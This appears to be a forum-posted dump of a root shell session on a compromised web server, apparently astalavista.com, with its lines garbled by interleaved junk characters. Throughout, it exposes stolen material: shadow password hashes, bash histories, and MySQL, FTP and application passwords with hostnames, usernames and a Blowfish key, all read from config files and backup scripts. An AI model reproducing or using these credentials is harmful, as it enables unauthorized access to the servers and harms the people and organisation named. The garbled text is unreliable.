com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
) N0 `/ M* S5 z3 I" Zastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
5 v2 E: B4 Y* }5 n% S
9 @1 k! Y' [/ a+ t5 tsh-3.2# cat /etc/motd
# u. W# Y" x$ y" `2 {#####################################################. B, Q- c! {' f+ G
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
7 Q; J f' p# G* L1 ~# |__| [__ | |__| | |__| | | | [__ | |__| #% Z$ J2 Z @3 G' _8 ?7 K/ m
# | | ___] | | | |___ | | \/ | ___] | | | #
: z9 m; \3 U& c. e6 H% l5 U# #- B4 K" a% A3 \4 ?' a
#####################################################
( d+ m4 Z# ^0 P+ S! s# #
5 e) v, c& [$ \; y# Admin Contact - 链接标记support@secureservertech.com #4 e3 v9 k- g9 z U5 ^/ B
# #7 ^7 A: |4 d; L) v5 j$ P
# Available ShortCuts #1 G) D9 f+ b; u1 F* I
# #4 W: m* s! d. K V
# nst - list active connections #
5 ~% X3 f7 p# x$ S' `# ddos - shows how many times each ip is connected #
# O& L8 t1 ^! R3 r0 a# ltr - restart the webserver #/ ?( V0 q9 Q! A7 q1 c: o- E' W
# phpc - edit the php config file #: k0 y* [7 N( ^; F- B, S8 f6 Y
# htc - edit the webserver configuration file #7 x) @8 b. i! k* p4 o
# up - uptime #
4 \9 F4 x8 |* v" y8 l# etd - edit the motd of the day file #& |# h$ B" K9 a8 p% Y3 V! J
# htr - start and restart apache if needed #
) J& D6 q: Z$ ~4 c6 B) f# syng - shows active SYN_RECV connections #2 F4 o( H% z* a _. \
# synd - syn flood blocker - “synd -h” for usage #
1 P* u/ W- U0 D6 ]#####################################################
$ U$ @" ? I* w% i! o3 O4 Z# NOTES: #
q( d) S. g" _0 J3 N! g# Last Upgrade - 12-08-2008 by JF #* C3 i9 q7 K3 i( q9 h, l9 \
# My.cnf/Mysql Optimization - 1-28-09 # H$ A+ Z! P! l, [' q$ I$ R: J
# #
2 i$ T' F5 Q* x) \+ `* w# #1 b( V6 X0 F' C
# #
- W" ^' u: y* F) t4 H2 c#####################################################
3 j y) f5 z* z2 M4 d' a. Z( }$ C
}5 r3 S9 O# z6 E0 xsh-3.2# lastlog | grep -v Never. x& [ E5 ~! D- ]) F: X' f
Username Port From Latest
7 L) \4 F1 I" sroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20098 v* X! [+ |3 t T
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
/ h/ R" g+ T" g, e2 p# [3 fcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
8 V ^+ B2 P& U3 G) U& O% oastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
# V" t6 v, L) | I' v2 B& U4 m" N: O c
5 e) x4 w9 {% X; w: ^) zsh-3.2# ls -la2 J0 e, q3 C4 i
total 453376) X# m: A/ C3 e4 f! ?
drwxr-x— 15 root root 4096 Jun 4 08:40 .
. N* r" j1 O! o7 ]% p' _ @drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..# K3 s& u$ D3 @ ~: S
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip# `6 _/ K0 A1 a- C. A
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg+ e! u" {( Z$ J! S4 I
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history4 z2 ?# D0 F' g% i( t; W0 z
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout3 }; h7 J+ i1 V! k1 A: q
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile$ q4 _6 V- E4 n, Z- P4 `: C' f
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc. I# _& h' o- O* l+ Y3 L( f
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh7 e0 J! M# l0 m0 k! ~1 Z0 B
-rw-r–r– 1 root root 1327 Nov 29 2007 cert& J, |. ~! J3 ^; \1 W
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
5 ]# b4 F2 ~& Y" r4 _- Y5 d! ^drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
' z N, ~- z' F1 u* R9 @9 ?-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc5 }3 x7 d3 p9 j
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
. M8 R2 F1 A6 c; `drwx—— 2 root root 4096 Oct 28 2007 .elinks
- }5 I+ x, P" y/ _* m h* fdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1) O# h( \1 ~9 `% c9 @
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
& _! O. d; v# {1 S' P-rw——- 1 root root 0 Apr 16 13:19 .history) B5 Y/ a# \5 u- L
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log3 |9 q4 _8 W' f( s/ R' G0 m
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog9 f8 p+ \; `2 P* k( _# k- Z+ d
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh3 O$ g' b% O/ f/ F3 j1 Z
-rw——- 1 root root 35 Jun 2 14:23 .lesshst/ ^8 i7 O1 g% U& h
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
+ n: g! b5 N% X X4 C2 ]6 n0 adrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec1 D5 { n6 L7 Q) v; X: f# p+ H
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
$ a; p1 I( `. k- o; O-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz26 g/ `4 n9 Z( c1 ?4 e' j9 Z+ i( l
-rwx—— 1 root root 760 Sep 18 2008 lp4 o5 `, B U2 |2 \' d
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
* b) }" G1 C0 T6 b2 O-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz; \2 N" |& x2 f$ d7 P H
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
1 t5 i+ F) i5 F6 cdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
1 |: ^+ p4 ~! c! v+ Y-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
, n9 Y1 R' L2 U2 i9 \; ]9 H$ F" Hdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
8 w; B1 I9 g! ~5 P5 i4 h-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
9 w1 m9 e+ s+ B1 f; Y-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
0 m F5 i/ ?) n) b-rw——- 1 root root 41 Oct 19 2007 .my.cnf
7 G% X. Z$ K7 x0 @; m- i# `& s-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history+ s( }9 R/ c# i: m. B
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
' ^0 U3 o& d$ v H$ i-rw——- 1 root root 41 May 20 2008 .mytop
1 Q1 [+ E( U5 K" F1 H/ jdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.64 u# I( F( B! u6 S2 Y
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz. @) E8 V* W7 c
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
2 n7 n8 B& R" y5 z% Z# p+ u-rw——- 1 root root 1462 Sep 21 2007 opt.php# H2 w6 s" }$ z' b
-rw-r–r– 1 root root 3371 Sep 22 2007 p
6 F/ b7 k) L3 r3 [; l% o- o7 Z-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
/ O3 Z5 W; `) A4 g" I4 I( l% E: K( {-rw——- 1 root root 1024 Feb 3 21:32 .rnd
" c, ]& o0 z/ \- K, c-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
* y: E) `9 P1 V3 |( ~-rw-r–r– 1 root root 887 Nov 28 2007 server.key' s0 x, R6 u! H8 Z; d
drwx—— 2 root root 4096 Oct 10 2008 .ssh
* ]' U8 s5 V3 R' n8 U) e-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat2 W H, {- m" y" y( z! u
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
- L* z6 [# \6 k) k# j) O% I-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
2 p. Z5 s% w4 Q/ w* s-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
1 g+ m- b1 o4 M! p1 rdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp. h$ v& L4 U& H+ C% l
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh O. m3 J" @- B
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0% s9 g: i2 x8 E- H/ _" L) Q
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz25 O# n/ W% W9 Q; p
-rw——- 1 root root 12997 May 16 2008 .viminfo
7 e: D/ m" I; K3 ~: L8 G
* e. q' D" n# u! D9 Gsh-3.2# cat .bash_history2 K' P9 z, D. N' ^' C% [( G. a
[snip]
' A1 [+ h, O9 z+ E6 vwget cp4sst.com/sstlinux.tar.gz
$ E6 m5 J; U5 qtar zxvf sstlinux.tar.gz$ {9 J8 `8 k) N) a' g
cd linux-2.6.27.106 R% i: z$ M2 B8 A
sh install.sh; z/ V: T" ]: \1 J) y
make bzImage ; make modules ; make modules_install ; make install$ M( F8 v/ v. ^+ i" U* f
make clean/ V$ y9 L" W4 E! k u: F8 {+ @( ?
service mysqld restart, ]- V- m' T$ J1 F9 Y b# z
[snip]
' S) c) ~' e7 Tcd /usr/sbin/
}& P# l9 o* Fchmod 4777 traceroute) k! B5 b2 m% I9 t$ G' F0 L
chmod 4777 ping- K; [5 x1 G" T2 z) R _6 _
traceroute -I 链接标记[url]www.astalavista.ch[/url]
& s) Q4 p5 s3 |+ d. |! C[snip]
1 [) I% v8 _" O" U" b* e2 Qvi /etc/csf/csf.conf
. V1 ^8 t. r# E3 h, u! ^3 \# `traceroute google.ch' Q- R8 S' J1 V' a" b8 s
service csf restart+ u R& ^. A- W6 A
tracert google.ch; J, K) ~4 z4 u- F
service csf restart$ N* K# K6 Q3 y, x' L; d
traceroute 链接标记[url]www.google.ch[/url]0 E- m- U" c4 Y# e9 D
tracert 链接标记[url]www.google.ch[/url]
: F6 S# f7 y( z4 |0 \- Itraceroute 链接标记[url]www.google.ch[/url]6 A* N4 j; a( D! E! J3 k
locate traceroute ^$ b0 Z9 X9 U8 {
chown 4755 /bin/traceroute! C( W# f h; l1 l8 u; Q' _; Y
chown 4777 /bin/traceroute1 S) e" U0 Y6 z; Z( n
locate ping3 N. N" y9 Y2 X1 w! `+ ^# t3 h
chown 4755 /bin/ping
& o' i4 A: B2 s/ dchown 4777 /bin/ping
: T" x4 ]+ v6 y Y& rcd /bin/0 `0 P* a" C1 t& ]) c
ls -ali | grep ping% ?+ S8 W5 R. @8 a' x& i# F1 M
chown root ping
$ r1 Z% ~% {# [- X; b3 S7 Mchmod 4755 ping
$ b2 H7 N F$ Hls -ali | grep traceroute
/ ~; x# _+ c% D7 a. xchown root traceroute1 t& h& I% o9 L
chmod 4755 traceroute4 R* B; N+ \0 ~/ q, m% h" |
ls -ali | grep traceroute
4 S2 E* |6 n4 _5 I/ V; g- H" qtraceroute -I 链接标记[url]www.google.ch[/url]
% j+ l; g2 s8 F9 O' i4 u# v; gtraceroute 链接标记[url]www.google.ch[/url]
0 p w/ f% S# Cwhois pmsantos.ch5 M. P5 y7 g* [ _- v
[snip]
; w" K% b& [5 E$ _" s1 c9 {- w* H3 Fmysql -h com_contrexx2_live < /root/defaultp_ports.sql
1 o7 Y0 w1 j7 p' Q4 X$ A/ pmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
& Z" A" H4 j! Jmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
1 M$ d- ~# {* v! D5 b/ W V! q6 [: emysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
; o) s, O3 Z* F6 ^2 G$ A4 stop1 Z2 d9 A# d, U, E3 @7 b$ S/ C$ A1 b1 u
ping ssth.ch1 O4 Y9 T6 _7 `4 f' ]8 }& S+ ?
ping asdlkfaljgasd???ljg???lasj.ch
; S& ^1 V1 Q$ Z( `9 y. S% pping asdlkfaljgasdlasj.ch( z& \4 C" ]% f) H; F
ping 链接标记[url]www.ssth.ch[/url]7 }5 X5 K: H: N- g; g; S! x5 Z+ |) _
ping ssth.ch, m3 s3 J% p+ J. _6 w, a
nslookup 链接标记[url]www.google.ch[/url]
/ X- t$ T+ j: v6 ^2 Y( ~nslookup 链接标记[url]www.ssth.ch[/url]8 `6 k: y/ a7 E1 ?
man nslookup
. @- r7 }4 P( L5 y' K4 l" mping 链接标记[url]www.google.ch[/url]% O' Z2 u( `6 v$ k. z
nslookup 链接标记[url]www.google.ch[/url]8 ?% c- E+ N( I6 Y/ S# |; t
nslookup 链接标记[url]www.google.ch[/url]! M4 {' @ l* ^. h! n" q
nslookup salfjasdlf.ch& j: u: R4 ~& e+ E' T- |9 C9 N" d
[snip] j; \4 C% p3 \( t, m6 n
openssl passwd -1 sadf) r c, a- y+ B P! S5 ?
openssl passwd -1 5cZNHstdTy
" l: g* l) K" p5 [. A4 imysql
+ a( G o2 F: q- Cmysql
% T7 ^& V$ O% Z! u0 }; W7 e5 glocate proftp+ U! I$ x/ b; t( K1 |; |0 D4 x
vi /etc/proftpd.passwd
# g' p# {; G3 F- n! Uservice proftpd restart
3 Y: t; [3 X6 _. Z+ N4 `* nlocate proftpd.conf: w3 n# ^2 Z2 J3 {# x& y( H8 q
vi /etc/proftpd.conf
( t- X8 A) p6 d% r5 S3 B/ a3 Tvi /etc/proftpd.passwd
1 Y8 W/ C: [: H$ D2 r/ sservice proftpd restart* V& B& M& ^3 H) s" G3 _
[snip]
3 a9 |% ^" o+ ^/bin/sh /home/com/backup_system/backup.sh
2 h9 ?: ~- J# L9 |tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
( W ~7 p8 U+ f! Y, {mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql6 I2 z R! R+ K$ }2 v9 o
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql% g! L% U/ o8 { r, X! d5 I! [# a
ls -ali1 j9 Y7 k3 N: e; C
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql) }1 a' n) E& ^ [5 v5 n- a
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql t; b: R: x+ V+ R; U; E
crontab -l c; r* H, t |3 X
crontab -l# n1 E3 C O& ~4 W9 d3 Q
php -q /home/com/public_html/modifications/cronjobs/securitynews.php, e0 P& ~/ t& o/ g. i3 k
/home/com/public_html/modifications/cronjobs/exploits.sh
% j I, P3 {& Z w) z5 owget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]8 }# A9 L2 S$ f. J( w% ]
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
6 _8 I# G7 p" {cd lsws-4.0.3
* c5 L) s, x4 c6 J/ lsh install.sh
/ n' g' \& R9 M% W5 g7 l$ {, Quptime; c, P, y- ]* K& n4 S7 e) R2 r
hdparm -tt /dev/sda- i3 V" z/ V. p- }
iostat
+ N/ w! I: v% Q% y) Cyum install iostat
! ~- p, d+ E* t. K; l. X% {. Aiostat
f/ d5 C+ Q4 a. l$ Xwhereis iostat
/ K6 j, N, K8 p+ R7 W) kyjm clean all
7 {, W6 I) f+ [5 s4 f; oyum clean all ; yum -y update
. ]: e9 B O/ X+ ]iostat1 B5 {$ \' ~+ G7 d3 x0 ]# ]
yum install systat0 ?2 P2 k5 f1 H# O2 _% I- Z6 J# C8 H
rpm -qa | grep iostat+ Z p# D B! M8 a
rpm -qa | grep sysstat
U0 v, T/ k& ?- |6 Lrpm -qa | grep systat% {! c; ? t4 t8 b4 g7 k
dmesg -c
! c- y, q7 ], b# p0 _( psysctl -p9 s# t" h- x) E! G. p/ Q. F. U$ k8 v
uname -r
/ _& N+ C' F' U' |& h2 A( lcd /usr/src. d( L' i/ ~/ ?% c3 S, q7 @, X+ p
wget nix101.com/kernels/sstlinux.tar.gz
R3 A3 W1 L$ @% s5 Kshutdown -r now: }5 t3 H! f$ m# c
nano -w /boot/grub/grub.conf4 ~5 Q. Y! [- H; L; u+ Q5 c: ~% G
! a$ h8 Y ]% |( d( N. Tsh-3.2# cat .my.cnf
9 i: n# G6 I" v/ [[client]2 ^) y9 N n" p
user=da_admin
: v' ^6 B2 b" x2 u: Npassword=X9dctmRH- M2 E7 X1 x( r/ {( p! S7 v
& i$ ]' ?$ x+ u7 o- l( Q" Ush-3.2# cat /home/com/backup_system/backup.sh
0 Z5 O C) F9 G9 B; d#!/bin/sh
' ?: m e n: @, Z% K# z& h; }#####################################################################" O* A D+ ~# Z$ U; H
# #6 x7 [" V! P; q/ Z/ I4 U. w
# incremental backup for astalavista.com #
3 Z2 h1 J U3 m* ~2 ~# #
0 `4 U6 L5 {! |8 E0 _! a# L# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #: r0 j2 M( R# ~& W: d5 x5 Q
# ## }5 G/ H. Y0 C. G8 {+ W, U& t
#####################################################################7 r+ [+ ?; l S& w
[snip]: K3 E2 q0 v {
PROG_DIR=”/home/com/backup_system”;, Y& \& D/ f& f
BACKUP_DIR=”/home/com/backups”;
- }, g4 }: F- k) E) X2 H+ ]DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;. q$ z) b# h' |9 s9 ?/ _
# ftp for synology backup server$ [8 V5 {! \1 d0 y. |& p% G1 I
FTP_HOST=”212.254.194.163″;
: X# X# { w* o9 a8 h, H2 gFTP_PORT=”21″;
) D& I' |. p3 J% hFTP_USER=”astalavista.com”;0 w' g1 P. R2 W$ A
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;) l/ S: M- [0 z
FTP_DIR=”/astalavista.com”;- ~, o% s0 i3 S5 |- Q# S
# database8 V; n/ L; l) E- X: ]
DB_HOST=”localhost”;: a& R9 o' N$ N/ E; i
DB_USER=”contrexxuser2″;
! Z( h* v) G$ O; }- bDB_PASS=”0fEYNZgXz1pKe”;1 M2 I3 l) p) Y' C
DB_DATABASE1=”com_contrexx2_live”;0 P, E1 e* \) H& M- \ Q, d
DB_DATABASE2=”com_contrexx2″;
3 J$ }" G6 B# v8 B; d5 Y' E[snip]$ h+ t) B' I. [
ftp -in $FTP_HOST $FTP_PORT <<EOF
3 x9 P) W! @% w I. N& @quote USER $FTP_USER1 v' f V/ l' r1 c1 T$ J
quote PASS $FTP_PASS
4 P& U$ a0 U. R! zcd $FTP_DIR* S* M" W2 r0 U% L& z4 B8 s
put $DB_FULLNAME-SQL_Dump.tar! Q( n. s$ S G9 K8 L2 M$ g5 }& a+ h
put $BACKUP_FULLNAME-Public_HTML.tar
1 R2 b, L3 _5 Vclose& {- V* [5 W+ J" m( r
bye% u+ R0 Q" |3 q% b; ^% e- y
EOF
- {6 M$ Q# L6 Q; r$ Z! Q3 a+ E- f0 P9 {- Q0 |
sh-3.2# cd /home
2 \; g5 K$ R8 {( H( X9 jsh-3.2# ls -la' Q- o2 r" s: J3 s9 N) w9 N
total 120
- _" q8 A0 n) F; U7 mdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
5 ^! G/ k Y" f$ K. cdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 T" k! t7 o7 adrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
9 N0 j1 o) o( z/ q' W; U/ d-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
9 Q8 b* X2 j8 t' f- b7 V4 K-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
7 H+ j! P3 k7 s& adrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
6 ]$ {1 a$ H+ I( Cdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup% Z# G5 \' @, w, F
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161$ X% E# Q7 Q$ v0 j2 @9 k
drwx–x–x 10 com com 4096 Apr 28 12:40 com
+ K$ K8 ?. R+ M# b) pdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
1 d& r1 [6 I" [2 x- r1 X8 Udrwx—— 3 jon jon 4096 Sep 21 2007 jon
0 J3 C" k# ~- U+ {: ]* E3 ~drwx—— 2 root root 16384 Sep 11 2007 lost+found
, A6 _# w9 {; G! y+ d+ n! n. R5 hdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
) v4 z4 j/ M9 h+ x( Q; r- Fdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
& h+ e" |, [4 @9 G4 h, b& Edrwx—— 2 jon jon 4096 Sep 15 2007 test
% n" j3 C$ f9 @$ C5 T. x. {drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp' q" x) W7 A h/ J& S
* ]! u0 A( k- x! g+ B* Nsh-3.2# cd admin
8 x; p8 ]3 R. J, ?( b" osh-3.2# ls -la
: G7 x( ^1 n2 u; \# mtotal 1735896
3 U7 q. d! |/ Z y/ cdrwx–x–x 9 admin admin 4096 Nov 28 2007 .* @4 u+ A) |1 \# O9 C) c
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
" B/ Q6 m' f( z _3 g1 Pdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
7 ^2 h0 A6 X O7 M' X# T3 q' h* P, o/ Ldrwx—— 2 admin admin 4096 Sep 28 2007 backups, T( U: s& V( S B, \- K8 e
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history/ ]/ V8 h2 u7 v6 _ \4 O& F0 L" [" C
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
' Y E, j+ Y% g3 h6 f-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile) U) A/ \+ \2 o- Y; [! Z
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
3 @4 f0 [1 T" a2 {8 `drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups0 y% ]5 f; ~8 ^7 |& s
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains0 q# V, I7 S1 c$ Z1 b: @
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap& i( c' p& U5 v2 C
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
* _1 ]4 N& {7 l) v6 ^6 B- Idrwx—— 2 admin admin 4096 Sep 21 2007 mail [# g& s2 F" [- `( C2 [( G8 }/ T
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
3 l9 B! s5 L8 J6 e8 Q7 }-rw-r–r– 1 root root 887 Nov 28 2007 server.key/ j+ T! L$ _2 n9 f' p3 @4 j
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
& [5 y' ]. m$ A5 i x: A-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
. ^7 a9 l, v" b, d% `( G: a! jdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
8 t) E; I! x- Q) |( Y1 Q( D
5 E/ A" a! K5 O( z- W. k6 lsh-3.2# ..
: {+ Y ]! D8 A, S P8 zsh-3.2# cd jon' o+ _5 _( w: S" k E
sh-3.2# ls -la
! @' j+ F: D8 _3 X- r& N" ztotal 36
8 m& W3 c% ]9 mdrwx—— 3 jon jon 4096 Sep 21 2007 .! p7 j1 X. }" c! V& o9 q e }
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ... l; f& ~' `7 i8 ~+ R, i4 O
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history6 r* Z2 H; N2 e9 L0 \* c
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
" h: J. D7 [# P; W& D ^-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
6 l S4 k! n( v-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
; f! p% }0 R- |-rw-r–r– 1 root root 24 Sep 21 2007 info.php
/ M7 i' J; d/ N" m; v3 udrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
8 k9 A9 @: ]0 A+ j- A) F% |: C5 F
9 k3 I2 i: I- T% C$ ~9 k" \sh-3.2# cd ..' o% \( c7 i* e( f2 A$ O
sh-3.2# cd test
2 R9 U& X0 c; Q+ ?3 psh-3.2# ls -la
$ B9 v6 W6 G* D/ Q* v5 |total 485 d8 X# G. I8 m% @+ e( v
drwx—— 2 jon jon 4096 Sep 15 2007 .3 o) s: m1 m6 o/ V
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
" F* m3 F5 `9 w$ c/ g$ `-rw——- 1 jon jon 79 Sep 21 2007 .bash_history$ v1 {& Y, _( r& u' Z! b- W( _
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout6 K6 _9 M, Y: K8 k l( ~
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
: n0 h/ @" v2 F# _# L/ N-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
3 h3 j# g! S- B# x/ F1 M+ g, Dsh-3.2# cat .bash_history: B4 M$ M& R( l6 P* ^( S! Z" ]& Z$ G
/usr/bin/mysqladmin -u root password PoliuJhytg67
% [! u" o C; s& ~, {. o" l
' c: S9 n, M; U" Ssh-3.2# cd ..
5 }3 p% I; W6 |' ysh-3.2# cd astanet8 ~; k4 ^. l! [, \$ K
sh-3.2# ls -la
( Q. c: z8 o+ ^total 52
: `% c8 d5 Y' I adrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
, U* F& [) ^0 Qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .., y% l9 o9 U9 ?$ h% a1 W
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
- p! L0 A* y6 } o-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history6 _! W( v* L: m( U" ^+ R! D
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
$ `: X/ {% Q3 ^: M8 }0 B-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
% f" W$ n$ ^) ~: G6 z9 x6 K-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
# X- b( L; P( o' Hdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
6 M, x" ~/ c* kdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
- _2 x9 ]8 h f5 h3 s/ ?% Gdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
: y( g4 u2 D+ P$ Y-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history1 v$ R7 ~3 r7 E% |; ?/ E0 E$ t3 e+ m
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html% a) a' Q+ K7 g& J
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
1 }2 w8 @1 w' S7 ]. h1 L0 g1 y
1 W0 P% C0 V& T* Jsh-3.2# cd auth/
/ |/ q1 u# ]8 }7 n {: Y, tsh-3.2# ls -la" V' n7 d( S) z( G" E* p
total 28
5 T& i$ h! a6 i4 j8 }) P( R+ Edrwxr-xr-x 2 root root 4096 Dec 23 16:00 .. e) @9 j# ^, _+ B0 o
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
4 l6 T; K2 V- |1 \) f. c; d-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php( h- }4 v4 z; J( x- x
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php. r8 G% z6 \9 ]
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd2 T) O, N, T8 z% E6 g( B
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
0 ~4 Y* Q# l1 {-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd1 R0 t0 a7 D7 i0 M5 y
& s' c9 r! `6 Ish-3.2# cat hackercontest.config.inc.php
' H9 s% R/ w1 X y0 L7 H<?PHP% c& m4 }2 @- K
// Variabeln f?r Verbindung zur Datenbank //8 @9 z* F3 I2 x; I' ]
$conxHost = ‘localhost’; // MySQL hostname
9 q/ x' U( { Z$conxUser = ‘hackercontest’; // MySQL user. ]6 `! g9 |1 G' r* d# O: Y6 I
$conxPassword = ‘K6m@7dUc’; // MySQL password
- D# B2 {! Y2 Y& }3 q7 ~) x$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish- K0 ?5 F- ~- i$ w: M- H* r
?>) I$ w1 K' c; Y2 i6 W& j
sh-3.2# cat hosting.config.inc.php
* x6 u/ y+ h8 g& R1 l<?PHP
4 e, l2 y" u+ K( n// Variabeln f?r Verbindung zur Datenbank //' G& M% M" K: H4 u. j1 K" N f
$conxHost = ‘localhost’; // MySQL hostname
6 u+ ?4 ^. N6 B* h% N$conxUser = ‘hostinguser’; // MySQL user
, W+ w6 c |, |1 _* X$conxPassword = ‘cXvB3981′; // MySQL password: y, g: Q$ O1 v
